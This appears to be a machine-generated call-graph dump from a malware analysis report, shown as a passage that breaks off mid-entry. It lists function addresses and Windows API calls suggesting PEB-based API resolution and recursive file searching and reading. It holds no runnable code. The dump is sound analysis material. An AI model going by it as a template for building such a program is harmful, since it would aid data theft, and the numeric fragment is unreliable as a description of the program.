9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 FindCloseChangeNotification 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API 